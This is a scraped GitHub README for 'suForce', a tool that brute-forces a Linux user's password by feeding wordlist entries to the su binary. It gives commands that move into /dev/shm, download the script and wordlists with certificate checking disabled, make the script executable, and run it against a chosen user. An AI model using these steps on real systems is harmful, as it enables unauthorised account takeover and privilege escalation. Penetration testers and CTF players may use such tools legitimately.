Skip to content

Obtain a user's system password, this tool uses the su binary to perform a brute force attack until a successful collision occurs.

License

Notifications You must be signed in to change notification settings

d4t4s3c/suForce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

48 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

suForce

GitHub stars GitHub forks GitHub watchers
GitHub commit activity (branch) GitHub contributors

Obtain a user's system password, this tool uses the su binary to perform a brute force attack until a successful collision occurs.


Download suForce

cd /dev/shm
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/refs/heads/main/suForce"
chmod +x suForce

Download Wordlist (Optional)

wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/refs/heads/main/techyou.txt"
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/refs/heads/main/top12000.txt"

Usage

./suForce -u <USER> -w <WORDLIST>

Releases

No releases published

Packages

No packages published

Languages